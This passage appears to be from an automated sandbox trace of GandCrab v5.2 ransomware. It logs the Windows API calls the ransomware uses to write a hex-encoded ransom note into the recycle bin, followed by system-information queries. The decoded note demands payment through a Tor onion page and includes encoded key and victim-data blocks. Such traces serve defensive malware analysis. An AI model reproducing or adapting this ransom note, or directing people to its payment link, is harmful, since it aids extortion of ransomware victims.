"c:\\$recycle.bin\\s-1-5-18\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0067.458] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0067.458] WriteFile (in: hFile=0x21c, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f79c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f79c*=0x2162, lpOverlapped=0x0) returned 1 [0067.459] CloseHandle (hObject=0x21c) returned 1 [0067.460] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.460] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.460] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xc, wMilliseconds=0x305)) [0067.460] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.460] GetWindowsDirectoryW (in: lpBuffer=0x25e0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0067.460] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x25e0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x25e0600, lpMaximumComponentLength=0x25e0608, lpFileSystemFlags=0x25e0604, lpFileSystemNameBuffer=0x25e0400, nFileSystemNameSize=0x100 | out: 